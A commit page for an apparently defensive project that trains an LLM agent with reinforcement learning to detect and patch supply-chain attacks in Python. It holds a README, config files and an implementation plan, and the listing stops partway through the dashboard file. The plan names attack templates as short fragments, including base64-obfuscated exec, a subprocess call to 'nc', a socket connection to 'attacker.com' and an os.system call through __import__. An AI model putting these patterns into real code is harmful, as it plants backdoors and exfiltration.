RAMCr7 commited on
Commit
91f7972
·
1 Parent(s): 9a00117

added inital

Browse files
Files changed (48) hide show
  1. README.md +118 -1
  2. config.yaml +28 -0
  3. docker/Dockerfile.sandbox +5 -0
  4. docs/implementation +277 -0
  5. requirements.txt +15 -0
  6. sentinel_synth/__init__.py +0 -0
  7. sentinel_synth/config.py +80 -0
  8. sentinel_synth/dashboard/__init__.py +0 -0
  9. sentinel_synth/dashboard/app.py +169 -0
  10. sentinel_synth/data/__init__.py +0 -0
  11. sentinel_synth/data/benign/ds_binarysearch.py +13 -0
  12. sentinel_synth/data/benign/ds_linkedlist.py +19 -0
  13. sentinel_synth/data/benign/ds_queue.py +15 -0
  14. sentinel_synth/data/benign/ds_sorting.py +8 -0
  15. sentinel_synth/data/benign/ds_stack.py +15 -0
  16. sentinel_synth/data/benign/io_config.py +15 -0
  17. sentinel_synth/data/benign/io_csv.py +11 -0
  18. sentinel_synth/data/benign/io_json.py +5 -0
  19. sentinel_synth/data/benign/io_log.py +8 -0
  20. sentinel_synth/data/benign/io_template.py +6 -0
  21. sentinel_synth/data/benign/math_factorial.py +5 -0
  22. sentinel_synth/data/benign/math_fibonacci.py +7 -0
  23. sentinel_synth/data/benign/math_gcd.py +5 -0
  24. sentinel_synth/data/benign/math_matrix.py +3 -0
  25. sentinel_synth/data/benign/math_prime.py +8 -0
  26. sentinel_synth/data/benign/misc_calc.py +13 -0
  27. sentinel_synth/data/benign/misc_date.py +3 -0
  28. sentinel_synth/data/benign/misc_password.py +8 -0
  29. sentinel_synth/data/benign/misc_temp.py +7 -0
  30. sentinel_synth/data/benign/misc_url.py +11 -0
  31. sentinel_synth/data/benign/str_anagram.py +3 -0
  32. sentinel_synth/data/benign/str_caesar.py +10 -0
  33. sentinel_synth/data/benign/str_palindrome.py +4 -0
  34. sentinel_synth/data/benign/str_slug.py +6 -0
  35. sentinel_synth/data/benign/str_wordcount.py +7 -0
  36. sentinel_synth/data/generate_scenarios.py +253 -0
  37. sentinel_synth/data/scenarios.json +402 -0
  38. sentinel_synth/data/sdk_config.yaml +33 -0
  39. sentinel_synth/envs/__init__.py +0 -0
  40. sentinel_synth/envs/sentinel_env.py +175 -0
  41. sentinel_synth/tests/__init__.py +0 -0
  42. sentinel_synth/tests/test_validator.py +57 -0
  43. sentinel_synth/training/__init__.py +0 -0
  44. sentinel_synth/training/train_grpo.py +187 -0
  45. sentinel_synth/validation/__init__.py +0 -0
  46. sentinel_synth/validation/docker_runner.py +107 -0
  47. sentinel_synth/validation/patch_validator.py +87 -0
  48. setup.py +15 -0
README.md CHANGED
@@ -1 +1,118 @@
1
- # PatchHawk
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # 🦅 Sentinel-Synth: Autonomous Supply-Chain Guard
2
+
3
+ **Sentinel-Synth** is an advanced Reinforcement Learning (RL) platform designed for the detection, analysis, and automated patching of software supply-chain vulnerabilities. It leverages **Group Relative Policy Optimization (GRPO)** and **Meta's Synthetic Data Kit** to train fine-tuned LLM agents that can secure CI/CD pipelines autonomously.
4
+
5
+ ---
6
+
7
+ ## 🏗 System Architecture
8
+
9
+ The Sentinel-Synth ecosystem is built on four functional pillars:
10
+
11
+ ```mermaid
12
+ graph TD
13
+ A[Meta SDK / Mutation Engine] -->|Synthetic Scenarios| B[Scenarios JSON]
14
+ B --> C[Gymnasium RL Environment]
15
+ C -->|Observations| D[GRPO Policy Agent (Qwen2.5-Coder)]
16
+ D -->|Actions| C
17
+ C -->|Validation| E[Docker Sandbox & Patch Validator]
18
+ E -->|Reward Signal| D
19
+ D -->|Metrics| F[W&B / Dashboard]
20
+ ```
21
+
22
+ ### Core Components
23
+ - **`sentinel_synth.data`**: Orchestrates scenario synthesis using Meta's `synthetic-data-kit` (Track A) and a custom mutation engine (Track B).
24
+ - **`sentinel_synth.envs`**: A `gymnasium` environment that formalizes DevSecOps tasks into an RL problem.
25
+ - **`sentinel_synth.validation`**: A two-tiered execution engine that uses isolated Docker containers for syntax checking and re-attack verification.
26
+ - **`sentinel_synth.training`**: The training loop using `trl` and `unsloth` for efficient GRPO fine-tuning.
27
+
28
+ ---
29
+
30
+ ## 🚀 Getting Started
31
+
32
+ ### 1. Prerequisites
33
+ - **Python 3.10+** (3.11 recommended)
34
+ - **Docker** (Ensure your user has permission to manage containers)
35
+ - **vLLM Server** (Optional, for Track A synthetic data generation)
36
+ - **GPU** (NVIDIA/AMD) for standard training; CPU supported for dry-runs.
37
+
38
+ ### 2. Installation
39
+ ```bash
40
+ # Set up a virtual environment (recommended)
41
+ python3 -m venv venv
42
+ source venv/bin/activate
43
+
44
+ # Install the base system
45
+ pip install -r requirements.txt
46
+ pip install -e .
47
+
48
+ # Build the sandbox Docker image
49
+ docker build -t sentinel-sandbox:latest -f docker/Dockerfile.sandbox .
50
+ ```
51
+
52
+ ### 3. Configuration
53
+ Copy the sample environment file and adjust your settings:
54
+ ```bash
55
+ cp .env.example .env # Define model paths, W&B keys, etc.
56
+ ```
57
+ Edit `config.yaml` to tune training hyperparameters and environment thresholds.
58
+
59
+ ---
60
+
61
+ ## 🧪 Detailed Workflow
62
+
63
+ ### 📤 Phase 1: Data Generation & Analysis
64
+ Sentinel-Synth generates diverse training scenarios including Typosquatting, Obfuscated Exec, and Subprocess Backdoors.
65
+
66
+ **Using Meta's Synthetic Data Kit (Track A):**
67
+ 1. Ensure a vLLM server is running.
68
+ 2. Configure `sentinel_synth/data/sdk_config.yaml`.
69
+ 3. Run the generator:
70
+ ```bash
71
+ python3 -m sentinel_synth.data.generate_scenarios --use-sdk --output data/scenarios.json
72
+ ```
73
+
74
+ **Using the Mutation Engine (Track B):**
75
+ This mode takes benign code and injects malicious patterns deterministically.
76
+ ```bash
77
+ python3 -m sentinel_synth.data.generate_scenarios --output data/scenarios.json
78
+ ```
79
+
80
+ ---
81
+
82
+ ### 🧠 Phase 2: Agent Training (GRPO)
83
+ Train the `Qwen2.5-Coder-7B` model using the novel Group Relative Policy Optimization algorithm. GRPO allows the agent to learn complex decision-making without a value model.
84
+
85
+ **Dry-Run (Pipeline Validation):**
86
+ Test the logic on CPU without a GPU:
87
+ ```bash
88
+ python3 -m sentinel_synth.training.train_grpo --dry-run
89
+ ```
90
+
91
+ **Full Training:**
92
+ ```bash
93
+ # Ensure WANDB is logged in or API key is in .env
94
+ python3 -m sentinel_synth.training.train_grpo --use-docker
95
+ ```
96
+ *The agent receives rewards based on: valid detection (+1.5), successful patching (+4.0), and avoiding false positives (-2.0).*
97
+
98
+ ---
99
+
100
+ ### 🛡 Phase 3: Validation & Sandbox Execution
101
+ Every patch proposed by the agent is autonomously validated in a secure Docker sandbox:
102
+ 1. **Syntax Check**: Ensuring the code is parseable.
103
+ 2. **Functional Test**: Running units tests from `scenarios.json`.
104
+ 3. **Re-Attack Verification**: The system re-executes the vulnerability payload to verify the patch actually neutralized the threat (e.g., checking if suspicious file writes or network calls stopped).
105
+
106
+ ---
107
+
108
+ ## 📊 Monitoring & UI
109
+ - **Weights & Biases**: Real-time tracking of mean rewards, action distributions, and loss curves.
110
+ - **Streamlit Dashboard**: A professional interface for interactive analysis:
111
+ ```bash
112
+ streamlit run sentinel_synth/dashboard/app.py
113
+ ```
114
+
115
+ ---
116
+
117
+ ## 📄 License
118
+ Sentinel-Synth is licensed under the Apache 2.0 License. See the LICENSE file for details.
config.yaml ADDED
@@ -0,0 +1,28 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # ============================================================
2
+ # Sentinel-Synth Training & Pipeline Configuration
3
+ # All tunable hyperparameters live here
4
+ # ============================================================
5
+
6
+ data_generation:
7
+ num_samples: 10
8
+ output_format: "json"
9
+ benign_dir: "sentinel_synth/data/benign/"
10
+ scenarios_output: "sentinel_synth/data/scenarios.json"
11
+ sdk_config: "sentinel_synth/data/sdk_config.yaml"
12
+
13
+ training:
14
+ learning_rate: 0.000001
15
+ group_size: 4
16
+ max_seq_len: 1024
17
+ max_steps: 100
18
+ gradient_accumulation_steps: 4
19
+ ppo_clip_eps: 0.2
20
+ lora_r: 16
21
+ lora_alpha: 16
22
+ lora_dropout: 0
23
+ output_dir: "grpo_lora"
24
+
25
+ environment:
26
+ max_steps: 5
27
+ use_docker: false
28
+ sandbox_timeout_sec: 5
docker/Dockerfile.sandbox ADDED
@@ -0,0 +1,5 @@
 
 
 
 
 
 
1
+ FROM python:3.11-slim
2
+ RUN useradd -m sandbox
3
+ USER sandbox
4
+ WORKDIR /app
5
+ CMD ["python", "script.py"]
docs/implementation ADDED
@@ -0,0 +1,277 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Sentinel-Synth Phase 1 — Implementation Plan
2
+
3
+ ## Goal
4
+
5
+ Build the complete Sentinel-Synth system: an RL-based supply-chain attack detection platform with synthetic data generation, a Gymnasium environment, Docker-sandboxed validation, GRPO training (Unsloth + W&B), and a Streamlit dashboard.
6
+
7
+ ## Project Structure
8
+
9
+ ```
10
+ PatchHawk/
11
+ ├── sentinel_synth/
12
+ │ ├── __init__.py
13
+ │ ├── envs/
14
+ │ │ ├── __init__.py
15
+ │ │ └── sentinel_env.py # Gymnasium RL environment
16
+ │ ├── data/
17
+ │ │ ├── __init__.py
18
+ │ │ ├── generate_scenarios.py # Synthetic data pipeline
19
+ │ │ ├── benign/ # 20-30 benign Python files
20
+ │ │ └── scenarios.json # Generated dataset (output)
21
+ │ ├── validation/
22
+ │ │ ├── __init__.py
23
+ │ │ ├── docker_runner.py # Docker sandbox execution
24
+ │ │ └── patch_validator.py # 3-step patch validation
25
+ │ ├── training/
26
+ │ │ ├── __init__.py
27
+ │ │ └── train_grpo.py # GRPO + Unsloth + W&B training
28
+ │ ├── dashboard/
29
+ │ │ └── app.py # Streamlit demo UI
30
+ │ └── tests/
31
+ │ ├── __init__.py
32
+ │ └── test_validator.py # Unit tests for validator
33
+ ├── docker/
34
+ │ └── Dockerfile.sandbox # Lightweight Python sandbox
35
+ ├── requirements.txt
36
+ ├── setup.py
37
+ └── README.md
38
+ ```
39
+
40
+ ---
41
+
42
+ ## Proposed Changes
43
+
44
+ ### Component 1: Benign Code Corpus (`sentinel_synth/data/benign/`)
45
+
46
+ #### [NEW] 25 benign Python files
47
+
48
+ Create 25 small, self-contained Python files that serve as the benign corpus for mutation. Categories:
49
+ - **Math utilities** (5): fibonacci, factorial, prime check, gcd, matrix ops
50
+ - **String utilities** (5): palindrome, anagram, caesar cipher, word count, slug generator
51
+ - **Data structures** (5): stack, queue, linked list, binary search, sorting
52
+ - **File/IO utilities** (5): CSV parser, JSON formatter, config reader, log parser, template engine
53
+ - **Misc** (5): temperature converter, password validator, date formatter, calculator, URL parser
54
+
55
+ Each file exports a main function with docstring and is testable with simple assertions.
56
+
57
+ ---
58
+
59
+ ### Component 2: Synthetic Data Generator (`sentinel_synth/data/generate_scenarios.py`)
60
+
61
+ #### [NEW] [generate_scenarios.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/data/generate_scenarios.py)
62
+
63
+ **Key design decisions:**
64
+ - **Track A (Meta synthetic-data-kit)**: Will be implemented as a pluggable module. Since it requires a running vLLM server with Llama 3 8B, the generator will have a `--use-sdk` flag. When disabled, it generates SDK-style examples from hardcoded templates (for offline/demo use).
65
+ - **Track B (Mutation engine)**: Deterministic mutation of benign files using 8 attack templates.
66
+ - Output: `scenarios.json` with 50+ entries.
67
+
68
+ **Attack templates (8):**
69
+ 1. Typosquatting import (`import pythonn`)
70
+ 2. Obfuscated exec (`exec(base64.b64decode(...))`)
71
+ 3. Environment variable hijack (`os.environ['PATH'] = '/tmp'`)
72
+ 4. Subprocess backdoor (`subprocess.call(['nc', ...])`)
73
+ 5. Pickle deserialization (`pickle.loads(untrusted)`)
74
+ 6. Hidden eval in decorator (`eval(user_input)`)
75
+ 7. Socket exfiltration (`socket.connect(('attacker.com', 80))`)
76
+ 8. Malicious `__import__` (`__import__('os').system('...')`)
77
+
78
+ **Scenario JSON schema:**
79
+ ```json
80
+ {
81
+ "id": "tp_001",
82
+ "type": "true_positive|false_positive|functional",
83
+ "code_snippet": "...",
84
+ "patch": "...|null",
85
+ "unit_test_code": "...|null",
86
+ "label": "malicious|benign",
87
+ "source": "mutation_engine|synthetic_data_kit|manual",
88
+ "attack_type": "typosquatting|obfuscated_exec|...|null"
89
+ }
90
+ ```
91
+
92
+ ---
93
+
94
+ ### Component 3: Docker Sandbox (`docker/Dockerfile.sandbox` + `sentinel_synth/validation/docker_runner.py`)
95
+
96
+ #### [NEW] [Dockerfile.sandbox](file:///home/ram/Ram/repos/PatchHawk/docker/Dockerfile.sandbox)
97
+
98
+ Minimal Python 3.11-slim image with non-root user, no network, memory/CPU limits.
99
+
100
+ #### [NEW] [docker_runner.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/validation/docker_runner.py)
101
+
102
+ - `run_in_docker(code, timeout_sec=5)` → `{"stdout", "stderr", "exit_code", "network_blocked", "file_writes"}`
103
+ - Uses `docker` Python SDK for container management
104
+ - Automatic temp directory cleanup
105
+ - Graceful container kill on timeout
106
+
107
+ ---
108
+
109
+ ### Component 4: Patch Validator (`sentinel_synth/validation/patch_validator.py`)
110
+
111
+ #### [NEW] [patch_validator.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/validation/patch_validator.py)
112
+
113
+ Three-step validation pipeline:
114
+ 1. **Syntax check**: `py_compile` in Docker
115
+ 2. **Unit test execution**: Run scenario's `unit_test_code` against patched code in Docker
116
+ 3. **Re-attack verification**: Confirm vulnerability is neutralized by comparing original vs. patched execution telemetry
117
+
118
+ Returns `(bool, str, dict)` — (passed, message, details).
119
+
120
+ ---
121
+
122
+ ### Component 5: Gymnasium Environment (`sentinel_synth/envs/sentinel_env.py`)
123
+
124
+ #### [NEW] [sentinel_env.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/envs/sentinel_env.py)
125
+
126
+ - Inherits `gymnasium.Env`
127
+ - **Observation space**: `Dict` with `code_snippet` (Text), `static_flags` (Box[5]), `risk_score` (Box[1])
128
+ - **Action space**: `Discrete(5)` — ANALYZE, EXECUTE_SANDBOX, BLOCK_PR, SUBMIT_PATCH, REQUEST_REVIEW
129
+ - `max_steps = 5`
130
+ - `reset()`: Random scenario selection, compute static flags + risk score
131
+ - `step(action)`: Full reward logic per spec (BLOCK=+2/-1, PATCH=+3/-1.5/-1, etc.)
132
+ - Integrates `docker_runner` and `patch_validator`
133
+
134
+ ---
135
+
136
+ ### Component 6: GRPO Training (`sentinel_synth/training/train_grpo.py`)
137
+
138
+ #### [NEW] [train_grpo.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/training/train_grpo.py)
139
+
140
+ - Load `Qwen2.5-Coder-7B` via Unsloth in 4-bit with LoRA
141
+ - Custom reward function that runs full environment trajectory
142
+ - `GRPOTrainer` from `trl` with group_size=4
143
+ - **W&B integration**: Log per-epoch metrics (mean reward, action distribution, patch success rate, loss)
144
+ - Hyperparameters: `lr=1e-6`, `group_size=4`, `ppo_clip_eps=0.2`, `max_seq_length=1024`
145
+ - Output: LoRA adapter to `./grpo_lora/`
146
+
147
+ > [!IMPORTANT]
148
+ > The training script requires GPU access (MI300X target) and a significant amount of VRAM for even the 4-bit model. During development, we'll include a `--dry-run` mode that validates the pipeline without actually training.
149
+
150
+ ---
151
+
152
+ ### Component 7: Streamlit Dashboard (`sentinel_synth/dashboard/app.py`)
153
+
154
+ #### [NEW] [app.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/dashboard/app.py)
155
+
156
+ - Code input text area
157
+ - "Analyze" button triggers environment run
158
+ - Display panels: Agent decision, Patch code, Validation result, Docker telemetry
159
+ - Demo mode with pre-loaded examples (1 malicious, 1 benign)
160
+ - Dark-themed UI with Cobalt Blue accent colors
161
+ - W&B run link display
162
+
163
+ ---
164
+
165
+ ### Component 8: Tests (`sentinel_synth/tests/test_validator.py`)
166
+
167
+ #### [NEW] [test_validator.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/tests/test_validator.py)
168
+
169
+ 4 test cases using pytest:
170
+ 1. `test_syntax_error_detected` — patch with syntax error → `(False, "Syntax error", ...)`
171
+ 2. `test_unit_test_pass` — correct patch → `(True, "Patch is valid", ...)`
172
+ 3. `test_unit_test_fail` — broken patch → `(False, "Unit test failed", ...)`
173
+ 4. `test_vulnerability_remains` — incomplete patch → `(False, "Vulnerability remains", ...)`
174
+
175
+ ---
176
+
177
+ ### Component 9: Project Configuration
178
+
179
+ #### [NEW] [requirements.txt](file:///home/ram/Ram/repos/PatchHawk/requirements.txt)
180
+
181
+ ```
182
+ gymnasium>=0.29.0
183
+ docker>=7.0.0
184
+ streamlit>=1.30.0
185
+ unsloth>=2024.0
186
+ trl>=0.7.0
187
+ transformers>=4.38.0
188
+ torch>=2.1.0
189
+ wandb>=0.16.0
190
+ pytest>=8.0.0
191
+ peft>=0.8.0
192
+ datasets>=2.16.0
193
+ ```
194
+
195
+ #### [NEW] [setup.py](file:///home/ram/Ram/repos/PatchHawk/setup.py)
196
+
197
+ Standard setuptools configuration registering `sentinel_synth` as a package.
198
+
199
+ #### [MODIFY] [README.md](file:///home/ram/Ram/repos/PatchHawk/README.md)
200
+
201
+ Full project documentation with architecture diagram, setup instructions, usage guide, and data flow.
202
+
203
+ ---
204
+
205
+ ## User Review Required
206
+
207
+ > [!IMPORTANT]
208
+ > **vLLM / Llama 3 dependency**: Track A of the data generator requires a running vLLM server with Llama 3 8B. Should I:
209
+ > - (A) Implement it with a fallback to template-based generation when the server is unavailable?
210
+ > - (B) Skip Track A entirely for Phase 1 and use only the mutation engine (Track B) + manual templates?
211
+
212
+ > [!IMPORTANT]
213
+ > **Docker requirement**: The sandbox and validator require Docker to be installed and the current user to have Docker permissions. Should I add a `--no-docker` mode that simulates sandbox execution for development/testing without Docker?
214
+
215
+ > [!WARNING]
216
+ > **W&B API key**: The training script needs a W&B API key. I'll use `wandb.login()` which reads from `WANDB_API_KEY` env var or prompts interactively. Is this acceptable?
217
+
218
+ ---
219
+
220
+ ## Open Questions
221
+
222
+ 1. **GPU availability**: Is the MI300X available now for testing the training script, or should I focus on making the pipeline work with `--dry-run` first?
223
+ 2. **Benign corpus**: Should I create the 25 benign Python files from scratch (my plan), or do you have an existing corpus to use?
224
+ 3. **synthetic-data-kit version**: Which version of Meta's synthetic-data-kit should I target? The API may have changed.
225
+
226
+ ---
227
+
228
+ ## Verification Plan
229
+
230
+ ### Automated Tests
231
+ ```bash
232
+ # 1. Generate scenarios
233
+ python -m sentinel_synth.data.generate_scenarios --output sentinel_synth/data/scenarios.json
234
+
235
+ # 2. Validate scenarios.json has 50+ entries
236
+ python -c "import json; d=json.load(open('sentinel_synth/data/scenarios.json')); assert len(d)>=50"
237
+
238
+ # 3. Build Docker sandbox image
239
+ docker build -t sentinel-sandbox:latest -f docker/Dockerfile.sandbox .
240
+
241
+ # 4. Run unit tests
242
+ pytest sentinel_synth/tests/test_validator.py -v
243
+
244
+ # 5. Test environment with gym checker
245
+ python -c "import gymnasium; from sentinel_synth.envs.sentinel_env import SentinelEnv; env=SentinelEnv(); gymnasium.utils.env_checker.check_env(env)"
246
+
247
+ # 6. Dry-run training
248
+ python -m sentinel_synth.training.train_grpo --dry-run
249
+
250
+ # 7. Launch dashboard
251
+ streamlit run sentinel_synth/dashboard/app.py
252
+ ```
253
+
254
+ ### Manual Verification
255
+ - Verify Docker containers are properly isolated (no network, memory limits)
256
+ - Verify W&B dashboard shows training metrics
257
+ - Verify Streamlit dashboard renders correctly with demo examples
258
+
259
+ ---
260
+
261
+ ## Execution Order
262
+
263
+ ```mermaid
264
+ graph TD
265
+ A[1. Project scaffolding + requirements] --> B[2. Benign corpus - 25 files]
266
+ B --> C[3. Data generator + scenarios.json]
267
+ A --> D[4. Dockerfile.sandbox]
268
+ D --> E[5. docker_runner.py]
269
+ E --> F[6. patch_validator.py]
270
+ C --> G[7. sentinel_env.py]
271
+ F --> G
272
+ G --> H[8. train_grpo.py + W&B]
273
+ F --> I[9. test_validator.py]
274
+ H --> J[10. Streamlit dashboard]
275
+ G --> J
276
+ J --> K[11. README.md]
277
+ ```
requirements.txt ADDED
@@ -0,0 +1,15 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ gymnasium>=0.29.0
2
+ docker>=7.0.0
3
+ streamlit>=1.30.0
4
+ unsloth>=2024.0
5
+ trl>=0.7.0
6
+ transformers>=4.38.0
7
+ torch>=2.1.0
8
+ wandb>=0.16.0
9
+ pytest>=8.0.0
10
+ peft>=0.8.0
11
+ datasets>=2.16.0
12
+ python-dotenv>=1.0.0
13
+ PyYAML>=6.0
14
+ synthetic-data-kit>=0.1.0
15
+ vllm-python-client>=0.1.0
sentinel_synth/__init__.py ADDED
File without changes
sentinel_synth/config.py ADDED
@@ -0,0 +1,80 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Centralized configuration loader for Sentinel-Synth.
3
+
4
+ Loads:
5
+ - .env → ENV dict (model names, API keys, secrets)
6
+ - config.yaml → CFG dict (training hyperparameters, paths)
7
+
8
+ Usage:
9
+ from sentinel_synth.config import ENV, CFG
10
+ """
11
+
12
+ import os
13
+ import yaml
14
+ from pathlib import Path
15
+
16
+ # ---------- .env loading (no external dependency) ----------
17
+ def _load_dotenv(path: str):
18
+ """Minimal .env parser — avoids requiring python-dotenv at import time."""
19
+ env = {}
20
+ if not os.path.exists(path):
21
+ return env
22
+ with open(path) as f:
23
+ for line in f:
24
+ line = line.strip()
25
+ if not line or line.startswith("#"):
26
+ continue
27
+ if "=" in line:
28
+ key, _, value = line.partition("=")
29
+ key = key.strip()
30
+ value = value.strip()
31
+ env[key] = value
32
+ # Also set in os.environ so downstream libs (wandb) pick it up
33
+ if value:
34
+ os.environ.setdefault(key, value)
35
+ return env
36
+
37
+ # Resolve project root (two levels up from this file)
38
+ _PROJECT_ROOT = Path(__file__).resolve().parent.parent
39
+ _dotenv_raw = _load_dotenv(str(_PROJECT_ROOT / ".env"))
40
+
41
+ ENV = {
42
+ "SYNTH_GENERATOR_MODEL": os.getenv("SYNTH_GENERATOR_MODEL", _dotenv_raw.get("SYNTH_GENERATOR_MODEL", "meta-llama/Llama-3.2-3B-Instruct")),
43
+ "GRPO_POLICY_MODEL": os.getenv("GRPO_POLICY_MODEL", _dotenv_raw.get("GRPO_POLICY_MODEL", "unsloth/Qwen2.5-Coder-7B-Instruct")),
44
+ "WANDB_API_KEY": os.getenv("WANDB_API_KEY", _dotenv_raw.get("WANDB_API_KEY", "")),
45
+ "WANDB_PROJECT": os.getenv("WANDB_PROJECT", _dotenv_raw.get("WANDB_PROJECT", "sentinel-synth")),
46
+ "WANDB_RUN_NAME": os.getenv("WANDB_RUN_NAME", _dotenv_raw.get("WANDB_RUN_NAME", "grpo-qwen-coder-7b")),
47
+ }
48
+
49
+ # ---------- config.yaml loading ----------
50
+ _config_path = _PROJECT_ROOT / "config.yaml"
51
+ if _config_path.exists():
52
+ with open(_config_path) as f:
53
+ CFG = yaml.safe_load(f)
54
+ else:
55
+ CFG = {
56
+ "data_generation": {
57
+ "num_samples": 10,
58
+ "output_format": "json",
59
+ "benign_dir": "sentinel_synth/data/benign/",
60
+ "scenarios_output": "sentinel_synth/data/scenarios.json",
61
+ "sdk_config": "sentinel_synth/data/sdk_config.yaml",
62
+ },
63
+ "training": {
64
+ "learning_rate": 1e-6,
65
+ "group_size": 4,
66
+ "max_seq_len": 1024,
67
+ "max_steps": 100,
68
+ "gradient_accumulation_steps": 4,
69
+ "ppo_clip_eps": 0.2,
70
+ "lora_r": 16,
71
+ "lora_alpha": 16,
72
+ "lora_dropout": 0,
73
+ "output_dir": "grpo_lora",
74
+ },
75
+ "environment": {
76
+ "max_steps": 5,
77
+ "use_docker": False,
78
+ "sandbox_timeout_sec": 5,
79
+ },
80
+ }
sentinel_synth/dashboard/__init__.py ADDED
File without changes
sentinel_synth/dashboard/app.py ADDED
@@ -0,0 +1,169 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import streamlit as st
2
+ import json
3
+ import time
4
+
5
+ from sentinel_synth.envs.sentinel_env import SentinelEnv
6
+
7
+ st.set_page_config(
8
+ page_title="Sentinel-Synth Dashboard",
9
+ page_icon="🛡️",
10
+ layout="wide",
11
+ initial_sidebar_state="expanded",
12
+ )
13
+
14
+ # Custom CSS for Cobalt Blue theming and dark mode
15
+ st.markdown("""
16
+ <style>
17
+ :root {
18
+ --cobalt-blue: #0047AB;
19
+ --cobalt-light: #2A6DC9;
20
+ --cobalt-dark: #002255;
21
+ }
22
+ .stApp {
23
+ background-color: #0d1117;
24
+ color: #c9d1d9;
25
+ }
26
+ .css-1d391kg {
27
+ background-color: #161b22;
28
+ }
29
+ /* Headers */
30
+ h1, h2, h3 {
31
+ color: #58a6ff !important;
32
+ }
33
+ /* Sidebar */
34
+ .css-1lcbmhc {
35
+ background-color: #161b22;
36
+ }
37
+ /* Buttons */
38
+ .stButton>button {
39
+ background-color: var(--cobalt-blue);
40
+ color: white;
41
+ border: none;
42
+ border-radius: 4px;
43
+ transition: 0.3s;
44
+ }
45
+ .stButton>button:hover {
46
+ background-color: var(--cobalt-light);
47
+ border: none;
48
+ color: white;
49
+ }
50
+ /* Info box */
51
+ .info-box {
52
+ background-color: #1c2128;
53
+ border-left: 4px solid var(--cobalt-blue);
54
+ padding: 1rem;
55
+ border-radius: 0.25rem;
56
+ margin-bottom: 1rem;
57
+ }
58
+
59
+ .status-malicious { color: #ff7b72; font-weight: bold; }
60
+ .status-benign { color: #3fb950; font-weight: bold; }
61
+ .status-patched { color: #79c0ff; font-weight: bold; }
62
+ </style>
63
+ """, unsafe_allow_html=True)
64
+
65
+ @st.cache_resource
66
+ def get_env():
67
+ return SentinelEnv(use_docker=False)
68
+
69
+ def main():
70
+ st.title("🛡️ Sentinel-Synth | GRPO DevSecOps Agent")
71
+ st.markdown("Supply-chain attack detection and auto-patching platform via Reinforcement Learning.")
72
+
73
+ env = get_env()
74
+
75
+ with st.sidebar:
76
+ st.header("Control Panel")
77
+ mode = st.radio("Mode", ["Demo Scenarios", "Custom Code"])
78
+ run_docker = st.checkbox("Use Docker Sandbox", value=False)
79
+ st.markdown("---")
80
+ st.markdown("**W&B Run:** [View Logs](https://wandb.ai)")
81
+ st.markdown("**LLM Adapter:** `grpo_lora_qwen`")
82
+
83
+ env.use_docker = run_docker
84
+
85
+ if mode == "Demo Scenarios":
86
+ col1, col2 = st.columns([1, 1])
87
+ with col1:
88
+ if st.button("Load Malicious Example"):
89
+ malicious = [s for s in env.scenarios if s["label"] == "malicious"]
90
+ if malicious:
91
+ st.session_state["code"] = malicious[0]["code_snippet"]
92
+ st.session_state["scenario"] = malicious[0]
93
+
94
+ with col2:
95
+ if st.button("Load Benign Example"):
96
+ benign = [s for s in env.scenarios if s["label"] == "benign"]
97
+ if benign:
98
+ st.session_state["code"] = benign[0]["code_snippet"]
99
+ st.session_state["scenario"] = benign[0]
100
+
101
+ code_input = st.text_area("Python Code Snippet", value=st.session_state.get("code", ""), height=300)
102
+
103
+ if st.button("Analyze & Diffuse"):
104
+ if not code_input:
105
+ st.warning("Please provide code to analyze.")
106
+ return
107
+
108
+ scenario = st.session_state.get("scenario")
109
